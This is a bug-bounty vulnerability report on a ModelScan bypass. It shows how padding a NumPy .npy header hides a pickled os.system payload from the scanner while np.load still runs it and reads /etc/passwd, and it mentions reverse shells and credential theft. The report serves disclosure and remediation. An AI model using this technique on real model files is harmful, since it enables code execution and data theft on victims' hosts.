ModelScan bypass: an oversized NumPy .npy header (scan-vs-load divergence) hides an object-array pickle, giving code execution on np.load while ModelScan reports 0 issues
Program: huntr - AI/ML Model File Formats (beta)
Target (dropdown): NumPy (.npy)
Affected tool: protectai/modelscan v0.8.8 (latest on PyPI): modelscan.scanners.NumpyUnsafeOpScan / modelscan/tools/picklescanner.py::scan_numpy
Affected NumPy range for the divergence: NumPy 1.24.3 to 2.0.x (the versions modelscan targets; modelscan==0.8.8 pins only numpy>=1.24.3). See "NumPy version note" for >=2.1.
Class: Scanner bypass via scan-vs-load parser divergence -> arbitrary code execution (and arbitrary file read) on model load.
Severity (honest): High. Maps to the NumPy .npy dropdown tier (up to $1,500). It is a true detection bypass of a CRITICAL-rated payload, but it is not a fully silent "green check"; see "Honest severity framing".
Status: CONFIRMED, re-verified locally on modelscan 0.8.8. Date: 2026-06-15
Summary
ModelScan inspects a NumPy .npy file for malicious pickle operators only after it parses the .npy header and confirms the array dtype is an object dtype (dtype.hasobject). It parses that header with NumPy's default header-size cap of max_header_size = 10000 characters.
NumPy's real loader, np.load(..., allow_pickle=True), parses the same header with max_header_size = 2**64. NumPy deliberately removes the cap on the load path because "the file is by definition trusted when allow_pickle is passed".
This asymmetry is exploitable. If an attacker pads the .npy header past 10000 characters:
- ModelScan's scan path raises ValueError("Header info length ... is large ...") before it ever checks the dtype, so it never disassembles the trailing pickle. ModelScan marks the file SKIPPED (SCAN_NOT_SUPPORTED), records a non-fatal scanner error, and reports total_issues = 0.
- The loader path parses the oversized header without complaint, sees the object dtype, and runs pickle.load(fp) -> arbitrary code execution.
The identical payload in a normal-size-header .npy is correctly caught by ModelScan as a CRITICAL os.system operator. Padding the header turns that CRITICAL detection into a 0-issue result, while the payload still fires on load. That divergence between what ModelScan parses and what NumPy loads is the vulnerability.
Root cause (exact locations in ModelScan + NumPy)
ModelScan: modelscan/tools/picklescanner.py, scan_numpy():
    elif magic == np.lib.format.MAGIC_PREFIX:
        # .npy file
        version = np.lib.format.read_magic(stream)  # line 230
        np.lib.format._check_version(version)  # line 231
        _, _, dtype = np.lib.format._read_array_header(stream, version)  # line 232 <-- DEFAULT cap = 10000
        if dtype.hasobject:  # line 234 <-- never reached for big header
            return scan_pickle_bytes(model, settings, scan_name, True, stream.tell())  # line 235 (the actual pickle scan)
        else:
            return ScanResults([], [], [])
_read_array_header(stream, version) is called without a max_header_size argument, so it uses NumPy's default of 10000. For a header longer than that, this line raises ValueError, so control never reaches the dtype.hasobject check on line 234 and the trailing pickle is never inspected.
NumPy: the load path uses an unbounded cap. np.load -> numpy.lib.format.read_array(fp, allow_pickle=True) calls the same header reader with max_header_size=2**64. From NumPy's own docs for read_array/load: "max_header_size ... is ignored when allow_pickle is passed, as the file is by definition trusted." Default max_header_size = 10000. So the loader parses what the scanner refuses to.
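The load-path behaviour can be checked without any pickle payload. The sketch below is not taken from make_poc.py or reproduce.py. `build_padded_npy` and `try_load` are hypothetical helpers: the first hand-writes a version 1.0 .npy file holding a plain int64 array with a space-padded header, the second loads it with and without allow_pickle=True. It assumes a NumPy release that supports max_header_size (1.24 or later).

```python
import io
import struct

import numpy as np


def build_padded_npy(array: np.ndarray, header_chars: int) -> bytes:
    """Hypothetical helper: write a 1-D numeric array as .npy v1.0 whose
    header is padded with spaces to exactly `header_chars` characters."""
    descr = np.lib.format.dtype_to_descr(array.dtype)
    literal = (
        f"{{'descr': {descr!r}, 'fortran_order': False, "
        f"'shape': {array.shape!r}, }}"
    )
    # NumPy's own writer also pads with spaces and ends the header with "\n".
    header = literal.ljust(header_chars - 1) + "\n"
    # v1.0 stores the header length as a little-endian uint16 (max 65535).
    preamble = np.lib.format.magic(1, 0) + struct.pack("<H", len(header))
    return preamble + header.encode("latin1") + array.tobytes()


def try_load(blob: bytes, **kwargs) -> str:
    """Report whether np.load accepts the blob under the given options."""
    try:
        np.load(io.BytesIO(blob), **kwargs)
        return "PARSED"
    except ValueError:
        return "RAISED"


data = np.arange(3, dtype="<i8")  # benign numeric data, no pickle involved
normal = build_padded_npy(data, header_chars=128)
oversized = build_padded_npy(data, header_chars=15057)

for name, blob in [("normal", normal), ("oversized", oversized)]:
    print(
        name,
        "| default:", try_load(blob),
        "| allow_pickle=True:", try_load(blob, allow_pickle=True),
    )
```

With the 10000-character default in place, the oversized file should raise on the default path and load once allow_pickle=True lifts the cap, while the normal file loads either way.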
How the raised ValueError becomes total_issues = 0: in modelscan/modelscan.py::_scan_source (lines 173-219), the exception from scan_numpy is caught at line 175, appended to self._errors as a ModelScanScannerError, and the loop continues without marking the file scanned. Because no scanner scanned the file, lines 209-219 then add a SkipCategories.SCAN_NOT_SUPPORTED skip. Net summary: total_issues=0, total_scanned=0, total_skipped=1, errors=1.
So the security control's "did you find anything?" answer is 0, even though a CRITICAL operator is sitting in the file's pickle.
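The control flow described above can be modelled in a few lines. This is a toy model only, not ModelScan's code: `Summary`, `toy_npy_scanner`, and `toy_scan` are hypothetical names, and each file is reduced to a header length and a flag saying whether its pickle holds a dangerous operator.

```python
from dataclasses import dataclass, field


@dataclass
class Summary:
    total_issues: int = 0
    total_scanned: int = 0
    total_skipped: int = 0
    errors: list = field(default_factory=list)


def toy_npy_scanner(header_len: int, has_bad_pickle: bool, cap: int = 10000) -> int:
    """Stand-in for a scanner that parses the header before the pickle."""
    if header_len > cap:
        # The header check fails first, so the pickle is never inspected.
        raise ValueError(f"Header info length ({header_len}) is large")
    return 1 if has_bad_pickle else 0


def toy_scan(files) -> Summary:
    """Catch scanner errors, record them, and count the file as skipped."""
    summary = Summary()
    for name, header_len, has_bad_pickle in files:
        try:
            issues = toy_npy_scanner(header_len, has_bad_pickle)
        except ValueError as exc:
            summary.errors.append(f"{name}: {exc}")
            summary.total_skipped += 1  # no scanner handled the file
            continue
        summary.total_scanned += 1
        summary.total_issues += issues
    return summary


baseline = toy_scan([("baseline_small.npy", 57, True)])
attack = toy_scan([("attack_bigheader.npy", 15057, True)])
print("baseline:", baseline.total_issues, "issue(s)")
print("attack:  ", attack.total_issues, "issue(s),", len(attack.errors), "error(s)")
```

In this model the same payload yields one issue at header length 57 and zero issues at 15057, because the exception is swallowed before the payload is ever examined.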
Proof of concept
The PoC builds two .npy files holding the same 1-element object array. The object's __reduce__ returns (os.system, ("<benign marker + /etc/passwd read>",)), so unpickling runs the command. NumPy stores an object array as pickle.dumps(ndarray) immediately after the header, so np.load(allow_pickle=True) unpickles it. The only difference between the two files is 15000 spaces of header padding.
- baseline_small.npy: header 57 chars -> expected: ModelScan DETECTS.
- attack_bigheader.npy: header 15057 chars -> expected: ModelScan MISSES (0 issues), np.load executes.
make_poc.py regenerates both files; reproduce.py runs the full two-part assertion below.
(a) ModelScan: baseline detected, attack missed (captured verbatim, modelscan 0.8.8)
[baseline] total_issues=1 total_scanned=1 total_skipped=0 errors=0
ISSUE: severity=CRITICAL operator=posix.system # 'nt.system' when scanned on Windows
[attack] total_issues=0 total_scanned=0 total_skipped=1 errors=1
ERROR: Header info length (15057) is large and may not be safe to load securely.
SKIP : SCAN_NOT_SUPPORTED - Model Scan did not scan file
ModelScan flags the unpadded object array as a CRITICAL os.system; the byte-for-byte identical payload with a padded header produces 0 issues.
(b) The NumPy divergence, demonstrated directly (no ModelScan involved)
reproduce.py STEP 0 calls NumPy's own header reader on both code paths:
scan-path default max_header_size : 10000
normal (57 chars) scan-path=PARSED loader-path=PARSED
oversized (15057 chars) scan-path=RAISED ValueError: Header ... loader-path=PARSED
The scan-time cap (10000) rejects the oversized header; the load-time cap (2**64) accepts it. This is the root divergence, verifiable without ModelScan at all.
(c) The loader executes the payload
np.load(attack_bigheader.npy, allow_pickle=True) ...
np.load returned repr : array([0], dtype=object)
RCE marker written : True -> code-exec # /tmp/modelscan_npy_pwned.txt
arbitrary file read : True (... bytes from /etc/passwd) # /tmp/modelscan_npy_file_read.txt
(Confirmed on the test host with a portable payload: np.load ran os.system, wrote the marker file code-exec, and, on Linux, copied /etc/passwd to a proof file. The returned array element is the command's exit status, confirming os.system executed during unpickling.)
Two-part assertion satisfied: ModelScan reports total_issues = 0 for attack_bigheader.npy (does not report the CRITICAL operator it catches at normal size), while np.load(..., allow_pickle=True) of that same file executes attacker code and reads a host file.
Impact
Threat model is the standard, ModelScan-endorsed "scan untrusted models before you load them" workflow: a victim downloads a .npy (e.g. from the Hub or a shared artifact store), runs modelscan -p model.npy, sees 0 issues, and then loads it with np.load(path, allow_pickle=True) (or any library that does so internally). Result on the victim host:
- Arbitrary code execution at load time (the os.system payload; replace with any command for a reverse shell, credential theft, persistence).
- Arbitrary file read / exfiltration as a sub-case (the PoC reads /etc/passwd; the same primitive reads cloud creds, SSH keys, tokens).
This is exactly the impact class ModelScan exists to prevent, and it is the same CRITICAL it correctly flags for the un-padded file, achieved here past the scanner.
Honest severity framing (what "bypass" does and does not mean)
I want to be precise for the triager: ModelScan does not print a reassuring green "0 issues - file scanned safe". For the attack file it prints total_issues = 0, marks the file skipped (SCAN_NOT_SUPPORTED), records a non-fatal scanner error, and the CLI exits non-zero (exit code 2/3, not 0). So the real-world severity depends on how the consuming pipeline interprets the result:
- Pipelines that gate on total_issues == 0 (a very common integration: "block if any issues, else proceed") treat this as a PASS and go on to np.load -> full RCE. For these, this is a complete detection bypass of a CRITICAL payload.
- Pipelines that fail-closed on skips/errors / non-zero exit are not bypassed; for them the impact degrades to a denial-of-scan (the malicious file is never assessed). Still a security-relevant gap (a hostile file evades inspection), but not silent RCE.
I am claiming the former, with the explicit caveat above: this is not a silent green check. The fix (below) is the same regardless of which interpretation a given user has.
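The two pipeline behaviours can be contrasted with a short sketch. The summary dictionaries below simply mirror the four counters from the captured output in section (a); they are an assumed shape for illustration, not ModelScan's JSON report schema, and `naive_gate` and `fail_closed_gate` are hypothetical names.

```python
def naive_gate(summary: dict) -> bool:
    """Proceed to load whenever no issues were reported."""
    return summary["total_issues"] == 0


def fail_closed_gate(summary: dict) -> bool:
    """Proceed only if the file was actually scanned, with no skips or errors."""
    return (
        summary["total_issues"] == 0
        and summary["total_skipped"] == 0
        and summary["errors"] == 0
        and summary["total_scanned"] > 0
    )


# Counters copied from the [baseline] and [attack] lines of the captured output.
baseline = {"total_issues": 1, "total_scanned": 1, "total_skipped": 0, "errors": 0}
attack = {"total_issues": 0, "total_scanned": 0, "total_skipped": 1, "errors": 1}

for name, summary in [("baseline", baseline), ("attack", attack)]:
    print(
        name,
        "| naive gate allows load:", naive_gate(summary),
        "| fail-closed gate allows load:", fail_closed_gate(summary),
    )
```

Only the naive gate lets the attack file through; both gates block the baseline file.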
Honest dup note (nearest prior art and why this is distinct)
Nearest public prior art is CVE-2025-46417 (SecDim / Sorin Boia, 2025), "Bypassing AI Model Scanners and Exfiltrate Sensitive Data". That issue is in picklescan (fixed in picklescan 0.0.25), and its root cause is that the scanner did not follow the pickle embedded inside a NumPy object array at all, i.e. a "scanner ignores object-array pickles" coverage gap. The payload is a numpy object array whose pickle does an SSL/DNS exfil.
This finding is distinct on both tool and root cause:
- Different tool: this is ModelScan, not picklescan. ModelScan does inspect the object-array pickle: scan_numpy explicitly checks dtype.hasobject and then calls scan_pickle_bytes (and it correctly catches the un-padded version as CRITICAL, as shown above). So the picklescan "doesn't look inside object arrays" gap does not apply.
- Different root cause: the bypass here is not "the scanner ignores the pickle". It is a parser/format desync: ModelScan reads the .npy header with max_header_size=10000 while NumPy's loader reads it with 2**64. An oversized header makes the scanner's parse fail before the dtype check, so the (otherwise-working) object-array pickle scan never runs. The exploit primitive is the header field, not the pickle contents.
Generic NumPy/pickle deserialization-RCE (CVE-2019-6446, the allow_pickle lineage) is also not this: that is about whether pickles run, and is well known. This finding is specifically about ModelScan failing to see a payload it is otherwise designed to catch, because of the header-size cap mismatch. I did not find this .npy header-size scan-vs-load divergence in ModelScan documented publicly.
(There is additionally a separate, version-specific defect: on NumPy >=2.1 the private symbols ModelScan imports, _check_version and _read_array_header, were relocated to numpy.lib._format_impl, so ModelScan's .npy scanner raises AttributeError and cannot scan any .npy at all on a fresh pip install modelscan. That is a different bug; this report is about the header-size divergence on the NumPy versions ModelScan targets. See the note in reproduce.py and README.)
Remediation
Make ModelScan's scan path parse exactly what the loader will parse:
- Parse the header with the same (unbounded) cap NumPy's loader uses. In scan_numpy, call np.lib.format._read_array_header(stream, version, max_header_size=2**64) so an oversized header can never prevent the dtype check. The header is being read only to learn the dtype, not loaded as data, so a large header is not itself dangerous here; it must not be allowed to skip the pickle scan.
- Fail closed on parse errors for known model formats. A .npy whose magic matched but whose header could not be parsed under the default cap should be treated as suspicious / unscannable-but-loadable, not as a benign skip that still yields total_issues = 0. At minimum, any object-dtype .npy that cannot be fully header-parsed should be reported as an issue (or the CLI/integration contract should make "skipped/errored" block by default), so a "scan clean -> load" pipeline cannot proceed.
- Defense in depth: if the header (under the safe cap) reports an object dtype, always scan the trailing pickle regardless of header-size anomalies; and document that total_issues == 0 is not a safe gate unless skipped == 0 and errors == 0.
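A minimal sketch of the first two points follows. It is not a patch to ModelScan: `classify_npy` and `header_only_npy` are hypothetical names, and instead of the private _read_array_header it uses NumPy's public read_array_header_1_0 / read_array_header_2_0, which accept the same max_header_size keyword on NumPy 1.24 or later. Any header it cannot parse, including format versions without a public reader, is treated as suspicious rather than skipped.

```python
import io
import struct

import numpy as np

# Public header readers only; other format versions fail closed in this sketch.
_HEADER_READERS = {
    (1, 0): np.lib.format.read_array_header_1_0,
    (2, 0): np.lib.format.read_array_header_2_0,
}


def classify_npy(stream) -> str:
    """Return 'scan-pickle', 'no-pickle', or 'suspicious' for a .npy stream."""
    try:
        version = np.lib.format.read_magic(stream)
        reader = _HEADER_READERS[version]
        # Use the same unbounded cap the loader applies with allow_pickle=True.
        _shape, _fortran_order, dtype = reader(stream, max_header_size=2**64)
    except (KeyError, ValueError):
        return "suspicious"  # fail closed: never a benign skip
    return "scan-pickle" if dtype.hasobject else "no-pickle"


def header_only_npy(descr: str, header_chars: int) -> bytes:
    """Hypothetical helper: a v1.0 magic plus padded header, with no array data."""
    literal = f"{{'descr': {descr!r}, 'fortran_order': False, 'shape': (1,), }}"
    header = literal.ljust(header_chars - 1) + "\n"
    preamble = np.lib.format.magic(1, 0) + struct.pack("<H", len(header))
    return preamble + header.encode("latin1")


samples = {
    "object dtype, oversized header": header_only_npy("|O", 15057),
    "int64 dtype, oversized header": header_only_npy("<i8", 15057),
    "truncated header": np.lib.format.magic(1, 0) + b"\xff\xff",
}
for label, blob in samples.items():
    print(label, "->", classify_npy(io.BytesIO(blob)))
```

After a successful parse the stream is positioned at the first byte following the header, which is where the pickle scan would start for an object dtype.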
Environment / reproduction
- protectai/modelscan 0.8.8 (latest), numpy 2.4.6 test host (see NumPy version note: the divergence is native on numpy 1.24.3 to 2.0.x; on >=2.1 reproduce.py re-binds the two private symbols ModelScan imports so the scanner runs as it does on its target NumPy; STEP 0 proves the divergence against NumPy directly, with no shim).
- Files in this package: report.md, README.md, reproduce.py (one-command end-to-end), make_poc.py (regenerates artifacts), baseline_small.npy, attack_bigheader.npy, scan_report.json (ModelScan JSON report for the attack file).
- Run: python reproduce.py -> prints the scanner numbers for both files, the NumPy divergence table, and the loader impact, then a VERDICT.
References
- ModelScan scan_numpy (header parse + dtype.hasobject gate): https://github.com/protectai/modelscan/blob/main/modelscan/tools/picklescanner.py
- ModelScan scan-result/skip/error aggregation: https://github.com/protectai/modelscan/blob/main/modelscan/modelscan.py
- NumPy read_array / load (max_header_size default 10000; ignored when allow_pickle=True): https://numpy.org/doc/stable/reference/generated/numpy.lib.format.read_array.html and https://numpy.org/doc/stable/reference/generated/numpy.load.html
- Nearest prior art: CVE-2025-46417 (picklescan object-array bypass; different tool and root cause): https://secdim.com/blog/post/cve-2025-46417-bypassing-ai-model-scanners-and-exfiltrate-sensitive-data-15594/ and https://nvd.nist.gov/vuln/detail/CVE-2025-46417
- Background: CVE-2019-6446 (NumPy allow_pickle RCE lineage): https://nvd.nist.gov/vuln/detail/CVE-2019-6446